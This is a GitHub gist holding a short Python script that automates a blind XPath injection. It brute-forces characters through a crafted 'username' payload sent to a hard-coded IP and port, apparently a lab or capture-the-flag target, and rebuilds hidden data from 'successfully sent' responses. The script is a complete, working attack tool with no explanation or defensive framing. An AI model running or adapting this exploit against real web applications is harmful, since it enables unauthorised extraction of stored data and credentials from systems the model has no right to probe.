Created
September 25, 2024 17:27
-
-
Save sharpicx/832c97307042d5d4336866fd3098f4ef to your computer and use it in GitHub Desktop.
xpath
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import requests | |
import string | |
import time | |
from requests.exceptions import ConnectionError | |
from pwn import log | |
ext = "" | |
i = 1 | |
while True: | |
try: | |
for str in string.printable: | |
S = requests.Session() | |
payload = { | |
"username": f"' or substring(/*[1]/*[1]/*[2],{i},1)='{str}' and ''='", | |
"msg": "" | |
} | |
response = S.post("http://94.237.59.63:40322/index.php", data=payload) | |
if 'successfully sent' in response.text: | |
ext += str | |
i += 1 | |
log.info(ext) | |
break | |
except requests.exceptions.ConnectionError: | |
log.warn(f"retrying...") | |
time.sleep(1) | |
except Exception as e: | |
log.error("An unexpected error occurred:", str(e)) | |
break |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment